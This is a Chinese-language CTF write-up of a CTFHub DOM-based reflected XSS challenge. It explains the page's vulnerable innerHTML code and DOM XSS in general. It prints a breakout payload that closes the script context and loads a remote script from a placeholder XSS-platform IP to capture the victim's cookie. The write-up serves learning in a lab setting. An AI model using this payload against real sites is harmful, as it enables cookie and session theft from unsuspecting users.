0x00 前言
CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。
0x01 题目描述
DOM反射:
(无)
0x02 解题过程
Ⅰ查看网页内容发现一个输入框和一个提交表单。第二个输入框用于模拟用户点击访问目标网页的一个过程。
Ⅱ尝试使用 scripts 标签写入一个警告弹窗,警告内容自定义。
<script>alert("flag")</script>
Ⅲ点击提交表单按钮,发现这里并未弹出警告弹窗。当然,不正常加载的原因有很多,可能是因为浏览器阻止、 HTML 的延迟加载、代码执行了过滤或转义处理等。
Ⅳ检查网页源代码,在 JS 部分,目标网页通过使用 $("#text")[0].innerHTML 获取为 text 元素的 ID ,并将内容设置为 CTFHub is very niubility 。
<div>
<h1>Hello, CTFHub
</h1>
<p id="text"></p>
<script>
$("#text")[0].innerHTML = 'CTFHub is very niubility';
</script>
</div>
Ⅴ尝试构造闭合语句,将构造好的 XSS 平台测试代码写入到目标网页中,点击提交。
';</script></textarea>'"><script src=http://XXX.XXX.XXX.XXX/Q7yYOv?1706691085></script>V
Ⅵ通过第二个输入框模拟用户执行后,访问 XSS 平台查看,在 cookie 中发现此题 flag 。
0x03 DOM反射
DOM 反射型 XSS 与其他类型 XSS 的区别在于攻击方式不同。在触发 DOM 反射型漏洞时,攻击者不需要与服务器进行交互。通常情况下,攻击者利用用户输入的数据,并通过网页中的 JavaScript 进行处理和渲染,从而实现攻击目的。
0x04 总结
文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。